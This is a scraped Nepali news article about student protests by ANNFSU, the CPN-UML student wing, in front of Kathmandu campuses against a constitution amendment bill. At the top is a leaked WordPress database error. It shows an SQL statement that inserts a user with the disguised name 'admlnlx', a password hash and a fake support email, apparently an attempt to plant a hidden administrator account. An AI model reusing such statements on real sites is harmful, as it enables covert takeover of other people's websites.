WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsUutBUrI.ypZdtwpPTy.zNL8kk1D9.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-25 23:46:19', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर १६–
सरकारले संविधान संशोधन बिधयेक संसदमा दर्ता गरेको बिरोधमा प्रमुख प्रतिपक्षी नेकपा एमालेको भातृ संगठन अनेरास्ववियुले आज बिहान काठमाडौंका बिभिन्न सरकारी क्याम्पस अगाडि बिरोध प्रदर्शन गरेको छ ।
बिद्यार्थीको बिरोध प्रदर्शनबाट आज बिहान काठमाडौंको केहि स्थानका ट्राफिक व्यवस्था अस्तव्यस्त बनेको थियो । यद्यपि ट्राफिक प्रहरीले अहिले सबै सामान्य भइसकेको बताएको छ ।
एमाले अखिल कार्यकर्ताले काठमाडौंका अमृत साइन्स, त्रिचन्द्र, आरआर, सरस्वती, पशुपति लगायतका क्याम्पस अगाडि बिरोध प्रदर्शन गरेका थिए ।
अखिलको केन्द्रीय कमिटीको आहृवानमा देशभरका प्रमुख क्याम्पसअगाडि प्रदर्शन गरिएको अखिलका सचिव सुदेश पराजुलीले जानकारी दिए ।
सरकारबिरुद्धको नारावाजीसहित प्रदर्शनमा उत्रिएका बिद्यार्थीहरुले साढे सातदेखि देखि १० बजेसम्म प्रदर्शन गर्दा कार्यालय समयमा काठमाडौंका बिभिन्न स्थानमा लामो ट्राफिक जाम भएको थियो ।